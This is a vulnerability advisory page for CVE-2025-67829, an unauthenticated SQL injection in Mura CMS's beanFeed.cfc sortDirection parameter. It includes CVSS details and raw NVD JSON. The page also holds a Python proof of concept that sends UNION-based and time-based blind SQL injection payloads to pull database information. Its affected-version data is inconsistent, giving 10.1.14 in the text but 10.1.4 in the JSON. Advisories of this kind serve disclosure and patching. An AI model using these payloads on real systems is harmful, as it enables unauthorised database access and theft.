Security Vulnerability Report
中文
CVE-2025-67829 CVSS 9.8 CRITICAL

CVE-2025-67829

Published: 2026-03-18 16:16:24
Last Modified: 2026-03-20 18:08:44

Description

Mura before 10.1.14 allows beanFeed.cfc getQuery sortDirection SQL injection.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* - VULNERABLE
Mura CMS < 10.1.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67829 PoC - Mura CMS beanFeed.cfc SQL Injection # Target: Mura CMS < 10.1.14 # Vulnerability: SQL Injection in sortDirection parameter target_url = "http://target-site.com/beanFeed.cfc" # Basic SQL Injection PoC - Extract database version payload = "' UNION SELECT @@version --" params = { "method": "getQuery", "sortColumn": "id", "sortDirection": payload } try: response = requests.get(target_url, params=params, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") # Time-based Blind SQL Injection for data extraction def blind_sql_inject(target_url, payload): # payload example: "' AND IF(1=1,SLEEP(5),0) --" params = { "method": "getQuery", "sortColumn": "id", "sortDirection": payload } response = requests.get(target_url, params=params, timeout=30) return response.elapsed.total_seconds() > 4 # Example: Test for database user # blind_sql_inject(target_url, "' AND IF(SUBSTRING(user(),1,4)='mura',SLEEP(5),0) --")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67829", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:24.190", "lastModified": "2026-03-20T18:08:44.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mura before 10.1.14 allows beanFeed.cfc getQuery sortDirection SQL injection."}, {"lang": "es", "value": "Mura antes de 10.1.14 permite beanFeed.cfc getQuery sortDirection inyección SQL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.1.4", "matchCriteriaId": "A8B87F3E-F3CD-442F-90DC-85BF9480F02A"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}]}}